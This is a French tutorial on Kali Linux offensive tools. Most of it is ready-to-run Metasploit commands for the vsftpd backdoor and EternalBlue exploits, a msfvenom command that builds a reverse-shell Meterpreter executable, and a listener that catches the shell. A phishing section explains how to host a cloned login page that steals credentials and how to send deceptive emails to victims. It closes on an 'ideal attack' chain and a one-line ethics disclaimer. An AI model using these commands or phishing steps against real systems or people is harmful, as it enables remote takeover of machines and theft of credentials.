Metasploit est un cadre d'exploitation de vulnérabilités qui peut être utilisé pour développer, tester et exécuter du code exploit contre une cible distante. Par exemple, supposons que vous ayez identifié une machine cible avec un service FTP vulnérable en utilisant Nmap. Vous pourriez utiliser Metasploit pour exploiter cette vulnérabilité comme suit :
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit
Dans cet exemple, use exploit/unix/ftp/vsftpd_234_backdoor indique à Metasploit d'utiliser un exploit spécifique qui cible une vulnérabilité dans le service FTP. set RHOSTS 192.168.1.1 détermine la machine cible et exploit lance l'exploitation.
Exemple:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploit
Ici, l'exploit ms17_010_eternalblue est utilisé, qui cible une vulnérabilité dans le protocole SMB de Windows.
Exemple:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
exploit
Cette commande configure Metasploit pour écouter une connexion entrante d'un payload Meterpreter inversé.
Pour créer et configurer un écouteur avec Metasploit, vous pouvez suivre les étapes suivantes:
Installez Metasploit Framework:
sudo apt-get install metasploit-framework
Démarrez Metasploit en utilisant la commande suivante:
msfconsole
Une fois que Metasploit est lancé, utilisez le module d'exploitation approprié. Par exemple, si vous utilisez un exécutable créé avec msfvenom, vous pouvez utiliser le module multi/handler:
use exploit/multi/handler
Configurez les options du module en fonction de l'exécutable que vous avez créé. Par exemple, si vous avez utilisé un payload windows/meterpreter/reverse_tcp, définissez le payload et les options LHOST et LPORT:
set payload windows/meterpreter/reverse_tcp
set LHOST your-ip-address
set LPORT listening-port
Lancez l'écouteur:
exploit
Une fois que la cible exécute l'exécutable malveillant, une session Meterpreter s'ouvrira et vous pourrez interagir avec le système de la cible.
<div>Mail phishing:
L'attaque par email de phishing est une technique courante utilisée par les attaquants pour tromper les utilisateurs et leur faire divulguer des informations sensibles ou installer des logiciels malveillants sur leur ordinateur.
Utiliser la commande;
sudo apt-get install apache2
pour installer le serveur web Apache, accéder au répertoire HTML du serveur en utilisant la commande;
cd /var/www/html/
et créer un nouveau répertoire nommé "phishing" en utilisant la commande;
mkdir phishing
accéder au répertoire "phishing" en utilisant la commande;
cd phishing
et créer un fichier index.html en utilisant la commande;
touch index.html
Enfin, ouvrir le fichier index.html en utilisant l'éditeur de texte nano en utilisant la commande;
nano index.html
et y ajouter le code source du site web légitime ainsi que du code malveillant pour voler les identifiants d'utilisateur.
Voici un exemple de fichier index.html d’attaque de phishing :
Page de connexion
Connectez-vous à votre compte
Dans ce fichier, le code source d'un site web légitime qui demande à l'utilisateur de saisir son nom d'utilisateur et son mot de passe pour se connecter. Du code malveillant en JavaScript pour capturer les identifiants de connexion saisis par l'utilisateur et les envoyer à un serveur de collecte de données hébergé sur son propre site web de Phishing.
Pour envoyer l’e-mail de Phishing, utiliser un client de messagerie comme Thunderbird et envoyer un e-mail qui semble provenir d'une source de confiance, comme une entreprise ou une organisation gouvernementale. Dans l'email, inclure un message convaincant qui incite l'utilisateur à cliquer sur un lien pour accéder à son compte ou à télécharger un fichier important.
Voici un exemple de commande pour envoyer l'email de phishing :
sudo apt-get install thunderbird
thunderbird
Ensuite, dans Thunderbird, cliquer sur le bouton "Nouveau message", remplir le champ "À" avec l'adresse e-mail de la victime, remplir le champ "Objet" avec un sujet convaincant, puis rédiger le corps de l’e-mail en incluant le lien vers son site web de Phishing.
Il est important de noter que les attaquants peuvent utiliser différentes méthodes pour récupérer les identifiants de connexion de l'utilisateur, et il est donc important de toujours vérifier l'URL du site web pour s'assurer qu'il s'agit bien du site web légitime. Il est également important d'utiliser des mots de passe forts et de ne jamais réutiliser le même mot de passe sur plusieurs comptes pour éviter que les identifiants de connexion ne soient compromis en cas d'attaque réussie..</div>
Exemple d’attaque idéale:
Utilisation de Nmap pour scanner le réseau à la recherche de vulnérabilités et de machines cibles :
nmap -sS -sV -T4 -oN outputfile.txt target
Utilisation de Wireshark pour espionner le trafic réseau et collecter des informations sur les machines cibles :
tshark -i interface -w capture.pcapng
Utilisation de msfvenom pour générer un payload malveillant et l'exécuter sur une machine cible pour prendre le contrôle à distance :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT= -f exe > payload.exe
Utilisation de Metasploit pour se connecter à la machine cible :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
set LPORT
exploit
Résumé :
Kali Linux est une distribution Linux spécialisée dans la sécurité informatique et les tests de pénétration. Basée sur Debian, elle offre une multitude d'outils et de fonctionnalités puissantes pour les professionnels de la sécurité. Cependant, il est essentiel de toujours utiliser ces outils de manière éthique et légale. En se basant sur la découverte de vulnérabilités et en corrigeant les failles de sécurité, il est possible de renforcer la protection de votre infrastructure contre les attaques.
By Platon-y.